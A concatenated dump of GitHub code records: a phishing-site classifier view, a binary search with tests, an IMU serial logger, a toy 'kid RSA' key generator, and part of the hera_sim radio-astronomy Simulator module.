df = pd.DataFrame(columns=['NumDots','PathLevel','NumDash','NumSensitiveWords',\r\n 'PctExtHyperlinks','PctExtResourceUrls','InsecureForms',\r\n 'PctNullSelfRedirectHyperlinks','FrequentDomainNameMismatch',\r\n 'SubmitInfoToEmail','IframeOrFrame'])\r\n\r\n df2 = {'NumDots': float(NumDots),'PathLevel': float(PathLevel),'NumDash': float(NumDash),\r\n 'NumSensitiveWords': float(NumSensitiveWords),'PctExtHyperlinks': float(PctExtHyperlinks)\r\n ,'PctExtResourceUrls': float(PctExtResourceUrls),'InsecureForms': float(InsecureForms),\r\n 'PctNullSelfRedirectHyperlinks': float(tooLong),'FrequentDomainNameMismatch':\r\n float(freq),'SubmitInfoToEmail': float(SubmitInfoToEmail),'IframeOrFrame': float(IframeOrFrame)}\r\n\r\n df = df.append(df2, ignore_index=True)\r\n # load the model from disk\r\n filename1 = 'polls/Phishing.pickle'\r\n loaded_model = pickle.load(open(filename1, 'rb'))\r\n res = loaded_model.predict(df)\r\n # print(res)\r\n if res[0] == 1:\r\n res = True\r\n else:\r\n res = False\r\n\r\n print(res)\r\n\r\n else:\r\n return redirect('homepage')\r\n else:\r\n pass\r\n\r\n return render(request, \"index.html\", {'response': res})","repo_name":"sadpasmgp/Solved_ML_projects","sub_path":"Phishing website Classification/mysite/polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"7980062545","text":"import unittest\nimport math\n\n\nclass 
MyTestCase(unittest.TestCase):\n def test_not_found(self):\n bsearch = Bsearch()\n index = bsearch.search([1, 3, 5, 10], 4)\n self.assertEqual(-1, index)\n\n def test_found(self):\n bsearch = Bsearch()\n index = bsearch.search([1, 3, 5, 8], 5)\n self.assertEqual(2, index)\n\n\nclass Bsearch:\n def search(self, array, elem):\n if len(array) == 0:\n return -1\n return self.sub_search(array, 0, len(array) - 1, elem)\n\n def sub_search(self, array, left, right, elem):\n if left == right - 1:\n if array[left] == elem:\n return left\n if array[right] == elem:\n return right\n return -1\n if left == right:\n if array[left] == elem:\n return left\n return -1\n pivot_index = math.floor((left + right) / 2)\n pivot = array[pivot_index]\n if pivot == elem:\n return pivot_index\n elif pivot > elem:\n return self.sub_search(array, left, pivot_index - 1, elem)\n else:\n return self.sub_search(array, pivot_index + 1, right, elem)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"IgorPerikov/py-solutions","sub_path":"alg/bsearch.py","file_name":"bsearch.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4202552127","text":"#! /usr/bin/env python3\n\n#Python imports\nimport argparse\nimport os\nimport sys\nimport time\n\n# Add Project root for imports\nFILE_PATH = sys.path[0]\nROOT_PATH = os.path.join(FILE_PATH, '..')\nsys.path.append(ROOT_PATH)\n\n# Project import\nfrom utils import create_simple_file, read_imu\n\n# 3rd party imports\nimport pandas as pd\nimport serial\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Log IMU data into simple \\\n file\")\n parser.add_argument(\"port\", type=str, help=\"device port for IMU \\\n connection\")\n parser.add_argument(\"logfile\", type=str, help=\"filepath of newly created \\\n logfile\")\n parser.add_argument(\"-a\", \"--action\", type=str, default='walking', \n help=\"Activity being recorded.\")\n parser.add_argument(\"-b\", \"--baudrate\", type=int, default=115200, \n help=\"baudrate of the connection\")\n parser.add_argument(\"-t\", \"--time_limit\", type=float, default=5.0, \n help=\"Length of logfile (in seconds)\")\n parser.add_argument(\"-s\", \"--sample_rate\", type=float, default=100.0, \n help=\"Sample rate of the IMU I2C interface\")\n\n args = parser.parse_args()\n #Log data\n frame = 1\n time_arr = []\n accx = []\n accy = []\n accz = []\n time_limit = args.time_limit - (1/args.sample_rate)\n input(\"Hit Enter to start logging\")\n\n ser = serial.Serial(args.port, args.baudrate)\n print(f\"Talking to {ser.name}\")\n start_time = time.time()\n time_diff = 0\n\n while(time_diff < time_limit):\n time_diff = time.time() - start_time\n time_arr.append(time_diff)\n ax, ay, az = read_imu(ser)\n accx.append(ax)\n accy.append(ay)\n accz.append(az)\n frame += 1\n\n ser.close()\n print(\"Done reading\")\n df = pd.DataFrame()\n df['Frames#'] = [i for i in range(1, frame)]\n df['Time'] = time_arr\n df['AccX'] = accx\n df['AccY'] = accy\n df['AccZ'] = accz\n\n create_simple_file(args.logfile, args.action, args.sample_rate, df)\n print(f\"File {args.logfile} is created\")","repo_name":"ryankshub/MotorArmProject","sub_path":"scripts/log_imu_data.py","file_name":"log_imu_data.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21705827989","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n'''\nkid 
RSA\nhttps://www.cs.uri.edu/cryptography/publickeykidkrypto.htm\n'''\n\nfrom kid_rsa import make_pair\nfrom sta_prompt import prompt_input, prompt_alert, has_console\n\ndef run_this():\n    ''' run this at pythonista '''\n    a = prompt_input('input a')\n    b = prompt_input('input b')\n    a1 = prompt_input('input a1')\n    b1 = prompt_input('input b1')\n\n    n, e, d, _ = make_pair(a, b, a1, b1)\n    pub_msg = f'Your public key: (n, e): ({n}, {e})\\n'\n    pri_msg = f'Your private key: (d): {d}'\n    msg = pub_msg + pri_msg\n    prompt_alert(msg)\n\nif __name__ == '__main__':\n    if has_console():\n        run_this()\n    else:\n        print('This script is designed to run in pythonista')\n","repo_name":"ericosur/ericosur-snippet","sub_path":"python3/kid_rsa/genkey_sta.py","file_name":"genkey_sta.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
{"seq_id":"8422400760","text":"\"\"\"Module containing a high-level interface for :mod:`hera_sim`.\n\nThis module defines the :class:`Simulator` class, which provides the user\nwith a high-level interface to all of the features provided by :mod:`hera_sim`.\nFor detailed instructions on how to manage a simulation using the\n:class:`Simulator`, please refer to the tutorials.\n\"\"\"\n\nimport functools\nimport inspect\nimport numpy as np\nimport time\nimport warnings\nimport yaml\nfrom astropy import constants as const\nfrom cached_property import cached_property\nfrom collections.abc import Sequence\nfrom deprecation import deprecated\nfrom pathlib import Path\nfrom pyuvdata import UVData\nfrom typing import Optional, Union\n\nfrom . import __version__, io, utils\nfrom .components import SimulationComponent, get_model, list_all_components\nfrom .defaults import defaults\n\n_add_depr = deprecated(\n    deprecated_in=\"1.0\", removed_in=\"2.0\", details=\"Use the :meth:`add` method instead.\"\n)\n\n# Define some commonly used types for typing purposes.\nAntPairPol = tuple[int, int, str]\nAntPair = tuple[int, int]\nAntPol = tuple[int, str]\nComponent = Union[str, type[SimulationComponent], SimulationComponent]\n\n\n# wrapper for the run_sim method, necessary for part of the CLI\ndef _generator_to_list(func, *args, **kwargs):\n    @functools.wraps(func)\n    def new_func(*args, **kwargs):\n        result = list(func(*args, **kwargs))\n        return None if result == [] else result\n\n    return new_func\n\n\nclass Simulator:\n    \"\"\"Simulate visibilities and/or instrumental effects for an entire array.\n\n    Parameters\n    ----------\n    data\n        :class:`pyuvdata.UVData` object to use for the simulation or path to a\n        UVData-supported file.\n    defaults_config\n        Path to defaults configuration, seasonal keyword, or configuration\n        dictionary for setting default simulation parameters. See tutorial\n        on setting defaults for further information.\n    redundancy_tol\n        Position tolerance for finding redundant groups, in meters. Default is\n        1 meter.\n    kwargs\n        Parameters to use for initializing UVData object if none is provided.\n        If ``data`` is a file path, then these parameters are used when reading\n        the file. 
Otherwise, the parameters are used in creating a ``UVData``\n object using :func:`~.io.empty_uvdata`.\n\n Attributes\n ----------\n data : :class:`pyuvdata.UVData` instance\n Object containing simulated visibilities and metadata.\n extras : dict\n Dictionary to use for storing extra parameters.\n antpos : dict\n Dictionary pairing antenna numbers to ENU positions in meters.\n lsts : np.ndarray of float\n Observed LSTs in radians.\n freqs : np.ndarray of float\n Observed frequencies in GHz.\n times : np.ndarray of float\n Observed times in JD.\n pols : list of str\n Polarization strings.\n red_grps : list of list of int\n Redundant baseline groups. Each entry is a list containing the baseline\n integer for each member of that redundant group.\n red_vecs : list of :class:`numpy.ndarray` of float\n Average of all the baselines for each redundant group.\n red_lengths : list of float\n Length of each redundant baseline.\n \"\"\"\n\n def __init__(\n self,\n *,\n data: Optional[Union[str, UVData]] = None,\n defaults_config: Optional[Union[str, dict]] = None,\n redundancy_tol: float = 1.0,\n **kwargs,\n ):\n # TODO: add ability for user to specify parameter names to look for on\n # parsing call signature\n # Create some utility dictionaries.\n self._components = {}\n self._seeds = {}\n self._antpairpol_cache = {}\n self._filter_cache = {\n \"delay\": {},\n \"fringe\": {},\n }\n\n # apply and activate defaults if specified\n if defaults_config:\n self.apply_defaults(defaults_config)\n\n # actually initialize the UVData object stored in self.data\n self._initialize_data(data, **kwargs)\n self._calculate_reds(tol=redundancy_tol)\n self.extras = self.data.extra_keywords\n for param in (\"Ntimes\", \"Nfreqs\", \"Nblts\", \"Npols\", \"Nbls\"):\n setattr(self, param, getattr(self.data, param))\n self.Nants = len(self.antpos)\n\n # Let's make some helpful methods from the UVData object available\n for attr in (\"data\", \"flags\", \"antpairs\", \"antpairpols\", \"pols\"):\n setattr(\n self,\n f\"get_{attr}\",\n getattr(self.data, f\"get_{attr}\"),\n )\n\n @property\n def antenna_numbers(self):\n return self.data.antenna_numbers\n\n @property\n def ant_1_array(self):\n return self.data.ant_1_array\n\n @property\n def ant_2_array(self):\n return self.data.ant_2_array\n\n @property\n def polarization_array(self):\n return self.data.polarization_array\n\n @property\n def data_array(self):\n \"\"\"Array storing the visibilities.\"\"\"\n return self.data.data_array\n\n @property\n def antpos(self):\n \"\"\"Mapping between antenna numbers and ENU positions in meters.\"\"\"\n antpos, ants = self.data.get_ENU_antpos(pick_data_ants=True)\n return dict(zip(ants, antpos))\n\n @property\n def lsts(self):\n \"\"\"Observed Local Sidereal Times in radians.\"\"\"\n # This process retrieves the unique LSTs while respecting phase wraps.\n _, unique_inds = np.unique(self.data.time_array, return_index=True)\n return self.data.lst_array[unique_inds]\n\n @property\n def freqs(self):\n \"\"\"Frequencies in GHz.\"\"\"\n return np.unique(self.data.freq_array) / 1e9\n\n @property\n def times(self):\n \"\"\"Simulation times in JD.\"\"\"\n return np.unique(self.data.time_array)\n\n @property\n def pols(self):\n \"\"\"Array of polarization strings.\"\"\"\n return self.data.get_pols()\n\n @cached_property\n def integration_time(self):\n \"\"\"Integration time, assuming it's identical across baselines.\"\"\"\n return np.mean(self.data.integration_time)\n\n @cached_property\n def channel_width(self):\n \"\"\"Channel width, assuming each 
channel is the same width.\"\"\"\n return np.mean(self.data.channel_width)\n\n def apply_defaults(self, config: Optional[Union[str, dict]], refresh: bool = True):\n \"\"\"\n Apply the provided default configuration.\n\n Equivalent to calling :meth:`~hera_sim.defaults.set` with the same parameters.\n\n Parameters\n ----------\n config\n If given, either a path pointing to a defaults configuration\n file, a string identifier of a particular config (e.g. 'h1c')\n or a dictionary of configuration parameters\n (see :class:`~.defaults.Defaults`).\n refresh\n Whether to refresh the defaults.\n \"\"\"\n defaults.set(config, refresh=refresh)\n\n def calculate_filters(\n self,\n *,\n delay_filter_kwargs: Optional[dict[str, Union[float, str]]] = None,\n fringe_filter_kwargs: Optional[dict[str, Union[float, str, np.ndarray]]] = None,\n ):\n \"\"\"\n Pre-compute fringe-rate and delay filters for the entire array.\n\n Parameters\n ----------\n delay_filter_kwargs\n Extra parameters necessary for generating a delay filter. See\n :func:`utils.gen_delay_filter` for details.\n fringe_filter_kwargs\n Extra parameters necessary for generating a fringe filter. See\n :func:`utils.gen_fringe_filter` for details.\n \"\"\"\n delay_filter_kwargs = delay_filter_kwargs or {}\n fringe_filter_kwargs = fringe_filter_kwargs or {}\n self._calculate_delay_filters(**delay_filter_kwargs)\n self._calculate_fringe_filters(**fringe_filter_kwargs)\n\n def add(\n self,\n component: Component,\n *,\n add_vis: bool = True,\n ret_vis: bool = False,\n seed: Optional[Union[str, int]] = None,\n vis_filter: Optional[Sequence] = None,\n component_name: Optional[str] = None,\n **kwargs,\n ) -> Optional[Union[np.ndarray, dict[int, np.ndarray]]]:\n \"\"\"\n Simulate an effect then apply and/or return the result.\n\n Parameters\n ----------\n component\n Effect to be simulated. This can either be an alias of the effect,\n or the class (or instance thereof) that simulates the effect.\n add_vis\n Whether to apply the effect to the simulated data. Default is True.\n ret_vis\n Whether to return the simulated effect. Nothing is returned by default.\n seed\n How to seed the random number generator. Can either directly provide\n a seed as an integer, or use one of the supported keywords. See\n tutorial for using the :class:`Simulator` for supported seeding modes.\n Default is to use a seed based on the current random state.\n vis_filter\n Iterable specifying which antennas/polarizations for which the effect\n should be simulated. See tutorial for using the :class:`Simulator` for\n details of supported formats and functionality.\n component_name\n Name to use when recording the parameters used for simulating the effect.\n Default is to use the name of the class used to simulate the effect.\n **kwargs\n Optional keyword arguments for the provided ``component``.\n\n Returns\n -------\n effect\n The simulated effect; only returned if ``ret_vis`` is set to ``True``.\n If the simulated effect is multiplicative, then a dictionary mapping\n antenna numbers to the per-antenna effect (as a ``np.ndarray``) is\n returned. 
Otherwise, the effect for the entire array is returned with\n the same structure as the ``pyuvdata.UVData.data_array`` that the\n data is stored in.\n \"\"\"\n # Obtain a callable reference to the simulation component model.\n model = self._get_component(component)\n model_key = (\n component_name if component_name else self._get_model_name(component)\n )\n if not isinstance(model, SimulationComponent):\n model = model(**kwargs)\n self._sanity_check(model) # Check for component ordering issues.\n self._antpairpol_cache[model_key] = [] # Initialize this model's cache.\n if seed is None and add_vis:\n warnings.warn(\n \"You have not specified how to seed the random state. \"\n \"This effect might not be exactly recoverable.\",\n stacklevel=2,\n )\n\n # Simulate the effect by iterating over baselines and polarizations.\n data = self._iteratively_apply(\n model,\n add_vis=add_vis,\n ret_vis=ret_vis,\n vis_filter=vis_filter,\n antpairpol_cache=self._antpairpol_cache[model_key],\n seed=seed,\n **kwargs,\n ) # This is None if ret_vis is False\n\n if add_vis:\n # Record the component simulated and the parameters used.\n if defaults._override_defaults:\n for param in getattr(model, \"kwargs\", {}):\n if param not in kwargs and param in defaults():\n kwargs[param] = defaults(param)\n self._update_history(model, **kwargs)\n if seed:\n kwargs[\"seed\"] = seed\n self._update_seeds(model_key)\n if vis_filter is not None:\n kwargs[\"vis_filter\"] = vis_filter\n self._components[model_key] = kwargs\n self._components[model_key][\"alias\"] = component\n else:\n del self._antpairpol_cache[model_key]\n\n return data\n\n def get(\n self,\n component: Component,\n key: Optional[Union[int, str, AntPair, AntPairPol]] = None,\n ) -> Union[np.ndarray, dict[int, np.ndarray]]:\n \"\"\"\n Retrieve an effect that was previously simulated.\n\n Parameters\n ----------\n component\n Effect that is to be retrieved. See :meth:`add` for more details.\n key\n Key for retrieving simulated effect. Possible choices are as follows:\n An integer may specify either a single antenna (for per-antenna\n effects) or be a ``pyuvdata``-style baseline integer.\n A string specifying a polarization can be used to retrieve the\n effect for every baseline for the specified polarization.\n A length-2 tuple of integers can be used to retrieve the effect\n for that baseline for all polarizations.\n A length-3 tuple specifies a particular baseline and polarization\n for which to retrieve the effect.\n\n Not specifying a key results in the effect being returned for all\n baselines (or antennas, if the effect is per-antenna) and polarizations.\n\n Returns\n -------\n effect\n The simulated effect appropriate for the provided key. Return type\n depends on the effect being simulated and the provided key. See the\n tutorial Jupyter notebook for the :class:`Simulator` for example usage.\n\n Notes\n -----\n This will only produce the correct output if the simulated effect is\n independent of the data itself. 
If the simulated effect contains a\n randomly-generated component, then the random seed must have been set\n when the effect was initially simulated.\n \"\"\"\n # Retrieve the model and verify it has been simulated.\n if component in self._components:\n model = self._get_component(self._components[component][\"alias\"])\n model_key = component\n else:\n model = self._get_component(component)\n model_key = self._get_model_name(component)\n if model_key not in self._components:\n raise ValueError(\"The provided component has not yet been simulated.\")\n\n # Parse the key and verify that it's properly formatted.\n ant1, ant2, pol = self._parse_key(key)\n self._validate_get_request(model, ant1, ant2, pol)\n\n # Prepare to re-simulate the effect.\n kwargs = self._components[model_key].copy()\n kwargs.pop(\"alias\") # To handle multiple instances of simulating an effect.\n seed = kwargs.pop(\"seed\", None)\n vis_filter = kwargs.pop(\"vis_filter\", None)\n if not isinstance(model, SimulationComponent):\n model = model(**kwargs)\n\n if model.is_multiplicative:\n # We'll get a dictionary back, so the handling is different.\n gains = self._iteratively_apply(\n model,\n add_vis=False,\n ret_vis=True,\n seed=seed,\n vis_filter=vis_filter,\n **kwargs,\n )\n if ant1 is not None:\n if pol:\n return gains[(ant1, pol)]\n return {key: gain for key, gain in gains.items() if ant1 in key}\n else:\n if pol:\n return {key: gain for key, gain in gains.items() if pol in key}\n return gains\n\n # Specifying neither antenna implies the full array's data is desired.\n if ant1 is None and ant2 is None:\n # Simulate the effect\n data = self._iteratively_apply(\n model,\n add_vis=False,\n ret_vis=True,\n seed=seed,\n vis_filter=vis_filter,\n antpairpol_cache=None,\n **kwargs,\n )\n\n # Trim the data if a specific polarization is requested.\n if pol is None:\n return data\n pol_ind = self.pols.index(pol)\n return data[:, :, pol_ind]\n\n # We're only simulating for a particular baseline.\n # First, find out if it needs to be conjugated.\n try:\n blt_inds = self.data.antpair2ind(ant1, ant2)\n if blt_inds.size == 0:\n raise ValueError\n conj_data = False\n except ValueError:\n blt_inds = self.data.antpair2ind(ant2, ant1)\n conj_data = True\n\n # We've got three different seeding cases to work out.\n if seed == \"initial\":\n # Initial seeding means we need to do the whole array.\n data = self._iteratively_apply(\n model,\n add_vis=False,\n ret_vis=True,\n seed=seed,\n vis_filter=vis_filter,\n antpairpol_cache=None,\n **kwargs,\n )[blt_inds, :, :]\n if conj_data: # pragma: no cover\n data = np.conj(data)\n if pol is None:\n return data\n pol_ind = self.data.get_pols().index(pol)\n return data[..., pol_ind]\n elif seed == \"redundant\":\n if conj_data:\n self._seed_rng(seed, model, ant2, ant1, pol)\n else:\n self._seed_rng(seed, model, ant1, ant2, pol)\n elif seed is not None:\n self._seed_rng(seed, model, ant1, ant2, pol)\n\n # Prepare the model parameters, then simulate and return the effect.\n if pol is None:\n data_shape = (self.lsts.size, self.freqs.size, len(self.pols))\n pols = self.pols\n return_slice = (slice(None),) * 3\n else:\n data_shape = (self.lsts.size, self.freqs.size, 1)\n pols = (pol,)\n return_slice = (slice(None), slice(None), 0)\n data = np.zeros(data_shape, dtype=complex)\n for i, _pol in enumerate(pols):\n args = self._initialize_args_from_model(model)\n args = self._update_args(args, model, ant1, ant2, pol)\n args.update(kwargs)\n if conj_data:\n self._seed_rng(seed, model, ant2, ant1, _pol)\n else:\n 
self._seed_rng(seed, model, ant1, ant2, _pol)\n data[..., i] = model(**args)\n if conj_data:\n data = np.conj(data)\n return data[return_slice]\n\n def plot_array(self):\n \"\"\"Generate a plot of the array layout in ENU coordinates.\"\"\"\n import matplotlib.pyplot as plt\n\n fig = plt.figure(figsize=(10, 8))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_xlabel(\"East Position [m]\", fontsize=12)\n ax.set_ylabel(\"North Position [m]\", fontsize=12)\n ax.set_title(\"Array Layout\", fontsize=12)\n dx = 0.25\n for ant, pos in self.antpos.items():\n ax.plot(pos[0], pos[1], color=\"k\", marker=\"o\")\n ax.text(pos[0] + dx, pos[1] + dx, ant)\n return fig\n\n def refresh(self):\n \"\"\"Refresh the object.\n\n This zeros the data array, resets the history, and clears the\n instance's ``_components`` dictionary.\n \"\"\"\n self.data.data_array = np.zeros(self.data.data_array.shape, dtype=complex)\n self.data.history = \"\"\n self._components.clear()\n self._antpairpol_cache.clear()\n self._seeds.clear()\n self._filter_cache = {\"delay\": {}, \"fringe\": {}}\n self.extras.clear()\n\n def write(self, filename, save_format=\"uvh5\", **kwargs):\n \"\"\"Write the ``data`` to disk using a ``pyuvdata``-supported filetype.\"\"\"\n try:\n getattr(self.data, f\"write_{save_format}\")(filename, **kwargs)\n except AttributeError:\n raise ValueError(\n \"The save_format must correspond to a write method in UVData.\"\n )\n\n # TODO: Determine if we want to provide the user the option to retrieve\n # simulation components as a return value from run_sim. Remove the\n # _generator_to_list wrapper if we do not make that a feature.\n @_generator_to_list\n def run_sim(self, sim_file=None, **sim_params):\n \"\"\"\n Run an entire simulation.\n\n Parameters\n ----------\n sim_file\n Path to a configuration file specifying simulation parameters.\n Required if ``sim_params`` is not provided.\n **sim_params\n Once-nested dictionary mapping simulation components to models,\n with each model mapping to a dictionary of parameter-value pairs.\n Required if ``sim_file`` is not provided.\n\n Returns\n -------\n components\n List of simulation components that were generated with the\n parameter ``ret_vis`` set to ``True``, returned in the order\n that they were simulated. This is only returned if there is\n at least one simulation component with ``ret_vis`` set to\n ``True`` in its configuration file/dictionary.\n\n Examples\n --------\n Suppose we have the following configuration dictionary::\n\n sim_params = {\n \"pntsrc_foreground\": {\"seed\": \"once\", \"nsrcs\": 500},\n \"gains\": {\"seed\": \"once\", \"dly_rng\": [-20, 20], \"ret_vis\": True},\n \"reflections\": {\"seed\": \"once\", \"dly_jitter\": 10},\n }\n\n Invoking this method with ``**sim_params`` as its argument will simulate\n visibilities appropriate for a sky with 500 point sources, generate\n bandpass gains for each antenna and apply the effect to the foreground\n data, then generate cable reflections with a Gaussian jitter in the\n reflection delays with a standard deviation of 10 ns and apply the\n effect to the data. The return value will be a list with one entry:\n a dictionary mapping antenna numbers to their associated bandpass gains.\n\n The same effect can be achieved by writing a YAML file that is loaded\n into a dictionary formatted as above. 
See the :class:`Simulator` tutorial\n for a more in-depth explanation of how to use this method.\n \"\"\"\n # make sure that only sim_file or sim_params are specified\n if not (bool(sim_file) ^ bool(sim_params)):\n raise ValueError(\n \"Either an absolute path to a simulation configuration \"\n \"file or a dictionary of simulation parameters may be \"\n \"passed, but not both. Please only pass one of the two.\"\n )\n\n # read the simulation file if provided\n if sim_file is not None:\n with open(sim_file) as config:\n try:\n sim_params = yaml.load(config.read(), Loader=yaml.FullLoader)\n except Exception:\n raise OSError(\"The configuration file was not able to be loaded.\")\n\n # loop over the entries in the configuration dictionary\n for component, params in sim_params.items():\n # make sure that the parameters are a dictionary\n if not isinstance(params, dict):\n raise TypeError(\n f\"The parameters for {component} are not formatted \"\n \"properly. Please ensure that the parameters for \"\n \"each component are specified using a dictionary.\"\n )\n\n # add the component to the data\n value = self.add(component, **params)\n\n # if the user wanted to return the data, then\n if value is not None:\n yield component, value\n\n def chunk_sim_and_save(\n self,\n save_dir,\n ref_files=None,\n Nint_per_file=None,\n prefix=None,\n sky_cmp=None,\n state=None,\n filetype=\"uvh5\",\n clobber=True,\n ):\n \"\"\"\n Chunk a simulation in time and write to disk.\n\n This function is a thin wrapper around :func:`~.io.chunk_sim_and_save`;\n please see that function's documentation for more information.\n \"\"\"\n io.chunk_sim_and_save(\n self.data,\n save_dir,\n ref_files=ref_files,\n Nint_per_file=Nint_per_file,\n prefix=prefix,\n sky_cmp=sky_cmp,\n state=state,\n filetype=filetype,\n clobber=clobber,\n )\n\n # -------------- Legacy Functions -------------- #\n @_add_depr\n def add_eor(self, model, **kwargs):\n \"\"\"Add an EoR-like model to the visibilities.\"\"\"\n return self.add(model, **kwargs)\n\n @_add_depr\n def add_foregrounds(self, model, **kwargs):\n \"\"\"Add foregrounds to the visibilities.\"\"\"\n return self.add(model, **kwargs)\n\n @_add_depr\n def add_noise(self, model, **kwargs):\n \"\"\"Add thermal noise to the visibilities.\"\"\"\n return self.add(model, **kwargs)\n\n @_add_depr\n def add_rfi(self, model, **kwargs):\n \"\"\"Add RFI to the visibilities.\"\"\"\n return self.add(model, **kwargs)\n\n @_add_depr\n def add_gains(self, **kwargs):\n \"\"\"Apply bandpass gains to the visibilities.\"\"\"\n return self.add(\"gains\", **kwargs)\n\n @_add_depr\n def add_sigchain_reflections(self, ants=None, **kwargs):\n \"\"\"Apply reflections to the visibilities. See :meth:`add` for details.\"\"\"\n if ants is not None:\n kwargs.update(vis_filter=ants)\n return self.add(\"reflections\", **kwargs)\n\n @_add_depr\n def add_xtalk(self, model=\"gen_whitenoise_xtalk\", bls=None, **kwargs):\n \"\"\"Add crosstalk to the visibilities. See :meth:`add` for more details.\"\"\"\n if bls is not None:\n kwargs.update(vis_filter=bls)\n return self.add(model, **kwargs)\n\n @staticmethod\n def _apply_filter(vis_filter, ant1, ant2, pol):\n \"\"\"Determine whether to filter the visibility for (ant1, ant2, pol).\n\n Functionally, ``vis_filter`` specifies which (ant1, ant2, pol) tuples\n will have a simulated effect propagated through the ``_iteratively_apply``\n method. 
``vis_filter`` acts as a logical equivalent of a passband filter.\n\n Parameters\n ----------\n vis_filter\n Either a polarization string, antenna number, baseline, antpairpol\n (baseline + polarization), collection of antenna numbers and/or\n polarization strings, or collection of such keys.\n ant1, ant2, pol\n Baseline + polarization to compare against the provided filter.\n\n Returns\n -------\n apply_filter\n False if the provided antpairpol satisfies any of the keys provided\n in ``vis_filter``; True otherwise. See examples for details.\n\n Examples\n --------\n ``vis_filter`` = (0,)\n returns: False for any baseline including antenna 0\n result: only baselines including antenna 0 have a simulated effect applied.\n\n ``vis_filter`` = ('xx',)\n returns: False if ``pol == \"xx\"`` else True\n result: only polarization \"xx\" has a simulated effect applied.\n\n ``vis_filter`` = (0, 1, 'yy')\n returns: False if ``(ant1, ant2, pol) in [(0, 1, 'yy'), (1, 0, 'yy)]``\n result: only baseline (0,1), or its conjugate, with polarization \"yy\" will\n have a simulated effect applied.\n \"\"\"\n # If multiple keys are passed, do this recursively...\n multikey = any(isinstance(key, (list, tuple)) for key in vis_filter)\n if multikey:\n apply_filter = [\n Simulator._apply_filter(key, ant1, ant2, pol) for key in vis_filter\n ]\n return all(apply_filter) # and approve if just one key fits.\n elif all(item is None for item in vis_filter):\n # Support passing a list of None.\n return False\n elif len(vis_filter) == 1:\n # For now, assume a string specifies a polarization.\n if isinstance(vis_filter[0], str):\n return not pol == vis_filter[0]\n # Otherwise, assume that this specifies an antenna.\n else:\n return not vis_filter[0] in (ant1, ant2)\n elif len(vis_filter) == 2:\n # TODO: This will need to be updated when we support ant strings.\n # Three cases: two pols; an ant+pol; a baseline.\n # If it's two polarizations, then make sure this pol is one of them.\n if all(isinstance(key, str) for key in vis_filter):\n return pol not in vis_filter\n # If it's an ant+pol, make sure both the antenna and pol are present.\n elif any(isinstance(key, str) for key in vis_filter):\n return not all(key in (ant1, ant2, pol) for key in vis_filter)\n # Otherwise, make sure the baseline is correct.\n else:\n return not (\n utils._listify(vis_filter) == [ant1, ant2]\n or utils._listify(vis_filter) == [ant2, ant1]\n )\n elif len(vis_filter) == 3:\n # Assume it's a proper antpairpol.\n return not (\n utils._listify(vis_filter) == [ant1, ant2, pol]\n or utils._listify(vis_filter) == [ant2, ant1, pol]\n )\n else:\n # Assume it's some list of antennas/polarizations.\n pols = []\n ants = []\n for key in vis_filter:\n if isinstance(key, str):\n pols.append(key)\n elif type(key) is int:\n ants.append(key)\n # We want polarization and ant1 or ant2 in the filter.\n # This would be used in simulating e.g. 
a few feeds that have an\n # abnormally high system temperature.\n return not (pol in pols and (ant1 in ants or ant2 in ants))\n\n def _calculate_reds(self, tol=1.0):\n \"\"\"Calculate redundant groups and populate class attributes.\"\"\"\n groups, centers, lengths = self.data.get_redundancies(tol=tol)\n self.red_grps = groups\n self.red_vecs = centers\n self.red_lengths = lengths\n\n def _calculate_delay_filters(\n self,\n *,\n standoff: float = 0.0,\n delay_filter_type: Optional[str] = \"gauss\",\n min_delay: Optional[float] = None,\n max_delay: Optional[float] = None,\n normalize: Optional[float] = None,\n ):\n \"\"\"\n Calculate delay filters for each redundant group.\n\n Parameters\n ----------\n standoff\n Extra extent in delay that the filter extends out to in order to\n allow for suprahorizon emission. Should be specified in nanoseconds.\n Default buffer is zero.\n delay_filter_type\n String specifying the filter profile. See :func:`utils.gen_delay_filter`\n for details.\n min_delay\n Minimum absolute delay of the filter, in nanoseconds.\n max_delay\n Maximum absolute delay of the filter, in nanoseconds.\n normalize\n Normalization of the filter such that the output power is the product\n of the input power and the normalization factor.\n\n See Also\n --------\n :func:`utils.gen_delay_filter`\n \"\"\"\n # Note that this is not the most efficient way of caching the filters;\n # however, this is algorithmically very simple--just use one filter per\n # redundant group. This could potentially be improved in the future,\n # but it should work fine for our purposes.\n for red_grp, bl_len in zip(self.red_grps, self.red_lengths):\n bl_len_ns = bl_len / const.c.to(\"m/ns\").value\n bl_int = sorted(red_grp)[0]\n delay_filter = utils.gen_delay_filter(\n self.freqs,\n bl_len_ns,\n standoff=standoff,\n delay_filter_type=delay_filter_type,\n min_delay=min_delay,\n max_delay=max_delay,\n normalize=normalize,\n )\n self._filter_cache[\"delay\"][bl_int] = delay_filter\n\n def _calculate_fringe_filters(\n self,\n *,\n fringe_filter_type: Optional[str] = \"tophat\",\n **filter_kwargs,\n ):\n \"\"\"\n Calculate fringe-rate filters for all baselines.\n\n Parameters\n ----------\n fringe_filter_type\n The fringe-rate filter profile.\n filter_kwargs\n Other parameters necessary for specifying the filter. These\n differ based on the filter profile.\n\n See Also\n --------\n :func:`utils.gen_fringe_filter`\n \"\"\"\n # This uses the same simplistic approach as the delay filter\n # calculation does--just do one filter per redundant group.\n for red_grp, (blx, _bly, _blz) in zip(self.red_grps, self.red_vecs):\n ew_bl_len_ns = blx / const.c.to(\"m/ns\").value\n bl_int = sorted(red_grp)[0]\n fringe_filter = utils.gen_fringe_filter(\n self.lsts,\n self.freqs,\n ew_bl_len_ns,\n fringe_filter_type=fringe_filter_type,\n **filter_kwargs,\n )\n self._filter_cache[\"fringe\"][bl_int] = fringe_filter\n\n def _initialize_data(\n self,\n data: Optional[Union[str, Path, UVData]],\n **kwargs,\n ):\n \"\"\"\n Initialize the ``data`` attribute with 